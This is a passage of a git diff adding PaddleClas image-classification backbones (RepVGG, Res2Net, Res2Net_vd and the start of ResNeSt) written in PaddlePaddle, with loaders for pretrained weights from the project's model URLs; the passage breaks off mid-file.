padding == 1 + + padding_11 = padding - kernel_size // 2 + + self.nonlinearity = nn.ReLU() + + self.rbr_identity = nn.BatchNorm2D( + num_features=in_channels + ) if out_channels == in_channels and stride == 1 else None + self.rbr_dense = ConvBN( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + groups=groups) + self.rbr_1x1 = ConvBN( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=1, + stride=stride, + padding=padding_11, + groups=groups) + + def forward(self, inputs): + if not self.training: + return self.nonlinearity(self.rbr_reparam(inputs)) + + if self.rbr_identity is None: + id_out = 0 + else: + id_out = self.rbr_identity(inputs) + return self.nonlinearity( + self.rbr_dense(inputs) + self.rbr_1x1(inputs) + id_out) + + def eval(self): + if not hasattr(self, 'rbr_reparam'): + self.rbr_reparam = nn.Conv2D( + in_channels=self.in_channels, + out_channels=self.out_channels, + kernel_size=self.kernel_size, + stride=self.stride, + padding=self.padding, + dilation=self.dilation, + groups=self.groups, + padding_mode=self.padding_mode) + self.training = False + kernel, bias = self.get_equivalent_kernel_bias() + self.rbr_reparam.weight.set_value(kernel) + self.rbr_reparam.bias.set_value(bias) + for layer in self.sublayers(): + layer.eval() + + def get_equivalent_kernel_bias(self): + kernel3x3, bias3x3 = self._fuse_bn_tensor(self.rbr_dense) + kernel1x1, bias1x1 = self._fuse_bn_tensor(self.rbr_1x1) + kernelid, biasid = self._fuse_bn_tensor(self.rbr_identity) + return kernel3x3 + self._pad_1x1_to_3x3_tensor( + kernel1x1) + kernelid, bias3x3 + bias1x1 + biasid + + def _pad_1x1_to_3x3_tensor(self, kernel1x1): + if kernel1x1 is None: + return 0 + else: + return nn.functional.pad(kernel1x1, [1, 1, 1, 1]) + + def _fuse_bn_tensor(self, branch): + if branch is None: + return 0, 0 + if isinstance(branch, ConvBN): + kernel = branch.conv.weight + running_mean = branch.bn._mean + running_var = branch.bn._variance + gamma = branch.bn.weight + beta = branch.bn.bias + eps = branch.bn._epsilon + else: + assert isinstance(branch, nn.BatchNorm2D) + if not hasattr(self, 'id_tensor'): + input_dim = self.in_channels // self.groups + kernel_value = np.zeros( + (self.in_channels, input_dim, 3, 3), dtype=np.float32) + for i in range(self.in_channels): + kernel_value[i, i % input_dim, 1, 1] = 1 + self.id_tensor = paddle.to_tensor(kernel_value) + kernel = self.id_tensor + running_mean = branch._mean + running_var = branch._variance + gamma = branch.weight + beta = branch.bias + eps = branch._epsilon + std = (running_var + eps).sqrt() + t = (gamma / std).reshape((-1, 1, 1, 1)) + return kernel * t, beta - running_mean * gamma / std + + +class RepVGG(nn.Layer): + def __init__(self, + num_blocks, + width_multiplier=None, + override_groups_map=None, + class_num=1000): + super(RepVGG, self).__init__() + + assert len(width_multiplier) == 4 + self.override_groups_map = override_groups_map or dict() + + assert 0 not in self.override_groups_map + + self.in_planes = min(64, int(64 * width_multiplier[0])) + + self.stage0 = RepVGGBlock( + in_channels=3, + out_channels=self.in_planes, + kernel_size=3, + stride=2, + padding=1) + self.cur_layer_idx = 1 + self.stage1 = self._make_stage( + int(64 * width_multiplier[0]), num_blocks[0], stride=2) + self.stage2 = self._make_stage( + int(128 * width_multiplier[1]), num_blocks[1], stride=2) + self.stage3 = self._make_stage( + int(256 * width_multiplier[2]), num_blocks[2], stride=2) + self.stage4 = self._make_stage( + int(512 * width_multiplier[3]), num_blocks[3], stride=2) + self.gap = nn.AdaptiveAvgPool2D(output_size=1) + self.linear = nn.Linear(int(512 * width_multiplier[3]), class_num) + + def _make_stage(self, planes, num_blocks, stride): + strides = [stride] + [1] * (num_blocks - 1) + blocks = [] + for stride in strides: + cur_groups = self.override_groups_map.get(self.cur_layer_idx, 1) + blocks.append( + RepVGGBlock( + in_channels=self.in_planes, + out_channels=planes, + kernel_size=3, + stride=stride, + padding=1, + groups=cur_groups)) + self.in_planes = planes + self.cur_layer_idx += 1 + return nn.Sequential(*blocks) + + def eval(self): + self.training = False + for layer in self.sublayers(): + layer.training = False + layer.eval() + + def forward(self, x): + out = self.stage0(x) + out = self.stage1(out) + out = self.stage2(out) + out = self.stage3(out) + out = self.stage4(out) + out = self.gap(out) + out = paddle.flatten(out, start_axis=1) + out = self.linear(out) + return out + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def RepVGG_A0(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[2, 4, 14, 1], + width_multiplier=[0.75, 0.75, 0.75, 2.5], + override_groups_map=None, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_A0"], use_ssld=use_ssld) + return model + + +def RepVGG_A1(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[2, 4, 14, 1], + width_multiplier=[1, 1, 1, 2.5], + override_groups_map=None, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_A1"], use_ssld=use_ssld) + return model + + +def RepVGG_A2(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[2, 4, 14, 1], + width_multiplier=[1.5, 1.5, 1.5, 2.75], + override_groups_map=None, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_A2"], use_ssld=use_ssld) + return model + + +def RepVGG_B0(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[1, 1, 1, 2.5], + override_groups_map=None, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B0"], use_ssld=use_ssld) + return model + + +def RepVGG_B1(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[2, 2, 2, 4], + override_groups_map=None, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B1"], use_ssld=use_ssld) + return model + + +def RepVGG_B1g2(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[2, 2, 2, 4], + override_groups_map=g2_map, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B1g2"], use_ssld=use_ssld) + return model + + +def RepVGG_B1g4(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[2, 2, 2, 4], + override_groups_map=g4_map, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B1g4"], use_ssld=use_ssld) + return model + + +def RepVGG_B2(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[2.5, 2.5, 2.5, 5], + override_groups_map=None, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B2"], use_ssld=use_ssld) + return model + + +def RepVGG_B2g2(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[2.5, 2.5, 2.5, 5], + override_groups_map=g2_map, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B2g2"], use_ssld=use_ssld) + return model + + +def RepVGG_B2g4(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[2.5, 2.5, 2.5, 5], + override_groups_map=g4_map, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B2g4"], use_ssld=use_ssld) + return model + + +def RepVGG_B3(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[3, 3, 3, 5], + override_groups_map=None, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B3"], use_ssld=use_ssld) + return model + + +def RepVGG_B3g2(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[3, 3, 3, 5], + override_groups_map=g2_map, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B3g2"], use_ssld=use_ssld) + return model + + +def RepVGG_B3g4(pretrained=False, use_ssld=False, **kwargs): + model = RepVGG( + num_blocks=[4, 6, 16, 1], + width_multiplier=[3, 3, 3, 5], + override_groups_map=g4_map, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RepVGG_B3g4"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net.py new file mode 100644 index 0000000..191cc84 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net.py @@ -0,0 +1,264 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "Res2Net50_26w_4s": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net50_26w_4s_pretrained.pdparams", + "Res2Net50_14w_8s": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net50_14w_8s_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__( + self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None, ): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels1, + num_channels2, + num_filters, + stride, + scales, + shortcut=True, + if_first=False, + name=None): + super(BottleneckBlock, self).__init__() + self.stride = stride + self.scales = scales + self.conv0 = ConvBNLayer( + num_channels=num_channels1, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a") + self.conv1_list = [] + for s in range(scales - 1): + conv1 = self.add_sublayer( + name + '_branch2b_' + str(s + 1), + ConvBNLayer( + num_channels=num_filters // scales, + num_filters=num_filters // scales, + filter_size=3, + stride=stride, + act='relu', + name=name + '_branch2b_' + str(s + 1))) + self.conv1_list.append(conv1) + self.pool2d_avg = AvgPool2D(kernel_size=3, stride=stride, padding=1) + + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_channels2, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels1, + num_filters=num_channels2, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + xs = paddle.split(y, self.scales, 1) + ys = [] + for s, conv1 in enumerate(self.conv1_list): + if s == 0 or self.stride == 2: + ys.append(conv1(xs[s])) + else: + ys.append(conv1(paddle.add(xs[s], ys[-1]))) + if self.stride == 1: + ys.append(xs[-1]) + else: + ys.append(self.pool2d_avg(xs[-1])) + conv1 = paddle.concat(ys, axis=1) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class Res2Net(nn.Layer): + def __init__(self, layers=50, scales=4, width=26, class_num=1000): + super(Res2Net, self).__init__() + + self.layers = layers + self.scales = scales + self.width = width + basic_width = self.width * self.scales + supported_layers = [50, 101, 152, 200] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + elif layers == 200: + depth = [3, 12, 48, 3] + num_channels = [64, 256, 512, 1024] + num_channels2 = [256, 512, 1024, 2048] + num_filters = [basic_width * t for t in [1, 2, 4, 8]] + + self.conv1 = ConvBNLayer( + num_channels=3, + num_filters=64, + filter_size=7, + stride=2, + act='relu', + name="conv1") + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels1=num_channels[block] + if i == 0 else num_channels2[block], + num_channels2=num_channels2[block], + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + scales=scales, + shortcut=shortcut, + if_first=block == i == 0, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + y = self.conv1(inputs) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def Res2Net50_26w_4s(pretrained=False, use_ssld=False, **kwargs): + model = Res2Net(layers=50, scales=4, width=26, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Res2Net50_26w_4s"], use_ssld=use_ssld) + return model + + +def Res2Net50_14w_8s(pretrained=False, use_ssld=False, **kwargs): + model = Res2Net(layers=50, scales=8, width=14, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Res2Net50_14w_8s"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net_vd.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net_vd.py new file mode 100644 index 0000000..a375679 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net_vd.py @@ -0,0 +1,305 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "Res2Net50_vd_26w_4s": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net50_vd_26w_4s_pretrained.pdparams", + "Res2Net101_vd_26w_4s": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net101_vd_26w_4s_pretrained.pdparams", + "Res2Net200_vd_26w_4s": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net200_vd_26w_4s_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__( + self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + is_vd_mode=False, + act=None, + name=None, ): + super(ConvBNLayer, self).__init__() + + self.is_vd_mode = is_vd_mode + self._pool2d_avg = AvgPool2D( + kernel_size=2, stride=2, padding=0, ceil_mode=True) + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + if self.is_vd_mode: + inputs = self._pool2d_avg(inputs) + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels1, + num_channels2, + num_filters, + stride, + scales, + shortcut=True, + if_first=False, + name=None): + super(BottleneckBlock, self).__init__() + self.stride = stride + self.scales = scales + self.conv0 = ConvBNLayer( + num_channels=num_channels1, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a") + self.conv1_list = [] + for s in range(scales - 1): + conv1 = self.add_sublayer( + name + '_branch2b_' + str(s + 1), + ConvBNLayer( + num_channels=num_filters // scales, + num_filters=num_filters // scales, + filter_size=3, + stride=stride, + act='relu', + name=name + '_branch2b_' + str(s + 1))) + self.conv1_list.append(conv1) + self.pool2d_avg = AvgPool2D(kernel_size=3, stride=stride, padding=1) + + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_channels2, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels1, + num_filters=num_channels2, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + xs = paddle.split(y, self.scales, 1) + ys = [] + for s, conv1 in enumerate(self.conv1_list): + if s == 0 or self.stride == 2: + ys.append(conv1(xs[s])) + else: + ys.append(conv1(xs[s] + ys[-1])) + if self.stride == 1: + ys.append(xs[-1]) + else: + ys.append(self.pool2d_avg(xs[-1])) + conv1 = paddle.concat(ys, axis=1) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class Res2Net_vd(nn.Layer): + def __init__(self, layers=50, scales=4, width=26, class_num=1000): + super(Res2Net_vd, self).__init__() + + self.layers = layers + self.scales = scales + self.width = width + basic_width = self.width * self.scales + supported_layers = [50, 101, 152, 200] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + elif layers == 200: + depth = [3, 12, 48, 3] + num_channels = [64, 256, 512, 1024] + num_channels2 = [256, 512, 1024, 2048] + num_filters = [basic_width * t for t in [1, 2, 4, 8]] + + self.conv1_1 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act='relu', + name="conv1_1") + self.conv1_2 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act='relu', + name="conv1_2") + self.conv1_3 = ConvBNLayer( + num_channels=32, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv1_3") + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152, 200] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels1=num_channels[block] + if i == 0 else num_channels2[block], + num_channels2=num_channels2[block], + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + scales=scales, + shortcut=shortcut, + if_first=block == i == 0, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def Res2Net50_vd_26w_4s(pretrained=False, use_ssld=False, **kwargs): + model = Res2Net_vd(layers=50, scales=4, width=26, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["Res2Net50_vd_26w_4s"], + use_ssld=use_ssld) + return model + + +def Res2Net101_vd_26w_4s(pretrained=False, use_ssld=False, **kwargs): + model = Res2Net_vd(layers=101, scales=4, width=26, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["Res2Net101_vd_26w_4s"], + use_ssld=use_ssld) + return model + + +def Res2Net200_vd_26w_4s(pretrained=False, use_ssld=False, **kwargs): + model = Res2Net_vd(layers=200, scales=4, width=26, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["Res2Net200_vd_26w_4s"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnest.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnest.py new file mode 100644 index 0000000..a414c29 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnest.py @@ -0,0 +1,738 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +import math +import paddle.nn as nn +import paddle.nn.functional as F +from paddle import ParamAttr +from paddle.nn.initializer import KaimingNormal +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.regularizer import L2Decay + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNeSt50_fast_1s1x64d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeSt50_fast_1s1x64d_pretrained.pdparams", + "ResNeSt50": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeSt50_pretrained.pdparams", + "ResNeSt101": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeSt101_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + dilation=1, + groups=1, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + bn_decay = 0.0 + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + dilation=dilation, + groups=groups, + weight_attr=ParamAttr(name=name + "_weight"), + bias_attr=False) + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr( + name=name + "_scale", regularizer=L2Decay(bn_decay)), + bias_attr=ParamAttr( + name + "_offset", regularizer=L2Decay(bn_decay)), + moving_mean_name=name + "_mean", + moving_variance_name=name + "_variance") + + def forward(self, x): + x = self._conv(x) + x = self._batch_norm(x) + return x + + +class rSoftmax(nn.Layer): + def __init__(self, radix, cardinality): + super(rSoftmax, self).__init__() + self.radix = radix + self.cardinality = cardinality + + def forward(self, x): + cardinality = self.cardinality + radix = self.radix + + batch, r, h, w = x.shape + if self.radix > 1: + x = paddle.reshape( + x=x, + shape=[ + batch, cardinality, radix, + int(r * h * w / cardinality / radix) + ]) + x = paddle.transpose(x=x, perm=[0, 2, 1, 3]) + x = nn.functional.softmax(x, axis=1) + x = paddle.reshape(x=x, shape=[batch, r * h * w, 1, 1]) + else: + x = nn.functional.sigmoid(x) + return x + + +class SplatConv(nn.Layer): + def __init__(self, + in_channels, + channels, + kernel_size, + stride=1, + padding=0, + dilation=1, + groups=1, + bias=True, + radix=2, + reduction_factor=4, + rectify_avg=False, + name=None): + super(SplatConv, self).__init__() + + self.radix = radix + + self.conv1 = ConvBNLayer( + num_channels=in_channels, + num_filters=channels * radix, + filter_size=kernel_size, + stride=stride, + groups=groups * radix, + act="relu", + name=name + "_1_weights") + + self.avg_pool2d = AdaptiveAvgPool2D(1) + + inter_channels = int(max(in_channels * radix // reduction_factor, 32)) + + # to calc gap + self.conv2 = ConvBNLayer( + num_channels=channels, + num_filters=inter_channels, + filter_size=1, + stride=1, + groups=groups, + act="relu", + name=name + "_2_weights") + + # to calc atten + self.conv3 = Conv2D( + in_channels=inter_channels, + out_channels=channels * radix, + kernel_size=1, + stride=1, + padding=0, + groups=groups, + weight_attr=ParamAttr( + name=name + "_weights", initializer=KaimingNormal()), + bias_attr=False) + + self.rsoftmax = rSoftmax(radix=radix, cardinality=groups) + + def forward(self, x): + x = self.conv1(x) + + if self.radix > 1: + splited = paddle.split(x, num_or_sections=self.radix, axis=1) + gap = paddle.add_n(splited) + else: + gap = x + + gap = self.avg_pool2d(gap) + gap = self.conv2(gap) + + atten = self.conv3(gap) + atten = self.rsoftmax(atten) + + if self.radix > 1: + attens = paddle.split(atten, num_or_sections=self.radix, axis=1) + y = paddle.add_n([ + paddle.multiply(split, att) + for (att, split) in zip(attens, splited) + ]) + else: + y = paddle.multiply(x, atten) + + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + inplanes, + planes, + stride=1, + radix=1, + cardinality=1, + bottleneck_width=64, + avd=False, + avd_first=False, + dilation=1, + is_first=False, + rectify_avg=False, + last_gamma=False, + avg_down=False, + name=None): + super(BottleneckBlock, self).__init__() + self.inplanes = inplanes + self.planes = planes + self.stride = stride + self.radix = radix + self.cardinality = cardinality + self.avd = avd + self.avd_first = avd_first + self.dilation = dilation + self.is_first = is_first + self.rectify_avg = rectify_avg + self.last_gamma = last_gamma + self.avg_down = avg_down + + group_width = int(planes * (bottleneck_width / 64.)) * cardinality + + self.conv1 = ConvBNLayer( + num_channels=self.inplanes, + num_filters=group_width, + filter_size=1, + stride=1, + groups=1, + act="relu", + name=name + "_conv1") + + if avd and avd_first and (stride > 1 or is_first): + self.avg_pool2d_1 = AvgPool2D( + kernel_size=3, stride=stride, padding=1) + + if radix >= 1: + self.conv2 = SplatConv( + in_channels=group_width, + channels=group_width, + kernel_size=3, + stride=1, + padding=dilation, + dilation=dilation, + groups=cardinality, + bias=False, + radix=radix, + rectify_avg=rectify_avg, + name=name + "_splat") + else: + self.conv2 = ConvBNLayer( + num_channels=group_width, + num_filters=group_width, + filter_size=3, + stride=1, + dilation=dilation, + groups=cardinality, + act="relu", + name=name + "_conv2") + + if avd and avd_first == False and (stride > 1 or is_first): + self.avg_pool2d_2 = AvgPool2D( + kernel_size=3, stride=stride, padding=1) + + self.conv3 = ConvBNLayer( + num_channels=group_width, + num_filters=planes * 4, + filter_size=1, + stride=1, + groups=1, + act=None, + name=name + "_conv3") + + if stride != 1 or self.inplanes != self.planes * 4: + if avg_down: + if dilation == 1: + self.avg_pool2d_3 = AvgPool2D( + kernel_size=stride, stride=stride, padding=0) + else: + self.avg_pool2d_3 = AvgPool2D( + 